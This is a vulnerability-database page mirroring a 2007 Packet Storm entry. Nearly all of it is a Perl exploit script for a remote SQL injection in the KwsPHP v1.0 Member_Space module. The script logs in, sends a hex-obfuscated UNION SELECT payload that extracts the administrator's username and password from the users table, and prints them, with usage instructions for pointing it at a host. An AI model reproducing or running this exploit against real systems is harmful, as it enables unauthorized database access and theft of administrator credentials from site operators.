Lucene search

K

kwsmember-sql.txt

๐Ÿ—“๏ธย 18 Sep 2007ย 00:00:00Reported byย S4miTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 19ย Views

KwsPHP v1.0 Member_Space Module Remote SQL injection Exploit. Access: Remote, level: Dangerous. This exploit works only when magic_quotes_gpc is OFF

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
  
use LWP::UserAgent;  
use HTTP::Cookies;  
  
$host = $ARGV[0];  
$User = $ARGV[1];  
$passwd = $ARGV[2];  
$url = "http://".$host;  
$port = "80";  
  
print q(  
################################################################  
# Script....................: KwsPHP v1.0 Member_Space Module #  
# Script Site...............: http://kws.koogar.org/ #  
# Vulnerability.............: Remote SQL injection Exploit #  
# Access....................: Remote #  
# level.....................: Dangerous #  
# Author....................: S4mi #  
# Contact...................: S4mi[at]LinuxMail.org #  
# This Exploit Work Only When magic_quotes_gpc Is OFF #  
################### (C)oded By S4mi ############################  
  
);  
  
  
if (@ARGV < 3) {  
print " # usage : xpl.pl host/path/ User Passwd\n";  
print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";  
exit();  
}  
  
print " [~] User/Password : $User/$passwd \n";  
print " [~] Host : $url \n";  
  
$xpl = LWP::UserAgent->new() or die;  
$cookie_jar = HTTP::Cookies->new();  
print " [~] Logining ...\n";  
$xpl->cookie_jar( $cookie_jar );  
$login = $xpl->post($url.'index.php',  
Content => [  
"pseudo" => "$User",  
"pass" => "$passwd",  
"submit" => "Se connecter",  
],);   
  
$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E"  
."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E"  
."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72"  
."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31"  
."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30"  
."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68"  
."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74"  
."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31"  
."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31"  
."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73"  
."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C"  
."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73"  
."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A"  
."\x2F\x69\x64\x3D\x31\x2F\x2A";  
  
$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61"  
."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64"  
."\x69\x74\x65\x72\x26\x69\x64\x3D";  
  
$target = $xpl->get($url."index.php?mod=$offset$evil0");  
  
  
  
if($target->as_string =~ /value="username:(.*?"/) {  
$zaz = $1;  
print " [+] Exploit succeed! Getting admin information. \n";  
print " [+] ------------------------------------------- \n";  
}  
if($target->as_string =~ /value="password:(.*?"/) {  
$luks = $1;  
print " [+] UserName : $zaz \n";  
print " [+] Password : $luks \n";  
}  
else {  
print " [-] Exploit Failed ! \n";  
}  
print "\n#############################################################\n";  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo